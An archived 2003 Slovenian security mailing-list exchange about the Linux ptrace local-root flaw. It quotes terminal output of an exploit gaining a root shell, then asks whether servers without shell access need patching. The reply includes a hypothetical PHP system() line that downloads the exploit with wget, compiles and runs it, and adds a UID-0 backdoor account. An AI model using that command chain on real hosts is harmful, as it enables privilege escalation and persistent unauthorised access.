[LUGOS-SEC] Ptrace vulnerability se enkrat
rok at noname.rula.net
rok at noname.rula.net
Tue Apr 15 17:07:27 CEST 2003
On 15.04.03 at 16:29:11 +0200, Nejc Skoberne wrote:
Zdravo.
Stvar je kar resna:
nejko at Stinker:~$ gcc -o ptrace-kmod ptrace-kmod.c
nejko at Stinker:~$ ./ptrace-kmod
[+] Attached to 1967
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000f287
[+] Now wait for suid shell...
sh-2.05a# uname -a
Linux Stinker 2.4.20 #3 SMP Mon Apr 3 23:47:03 CEST 2006 i586 unknown
$ uname -r
2.4.18-wolk3.8
$ ./ptrace
[+] Attached to 20108
[+] Signal caught
[+] Shellcode placed at 0x2000f287
[-] Unable to write shellcode: Input/output error
Killed
$ id
uid=1000(r) gid=100(users) groups=100(users)
Pri streznikih, pri katerih uporabniki nimajo shell dostopa - a se
splaca patchati ali pocakati na 2.6?
Hipoteticno, da mas na masini ftp pa www server, pa apache ti laufa tud z
php podporo... a bi blo tezko uporabniku napisat eno skriptico pa jo poslat
gor, pol pa z phpjem zagnat skripto in z njo exploit?
cetud nima ftpja...
system('wget ...ptrace.c; make ptrace; ./ptrace; useradd r00t -u 0 -p t00r');
seveda nimam pojma ce bi zgornje delalo...
lp, rok
More information about the lugos-sec
mailing list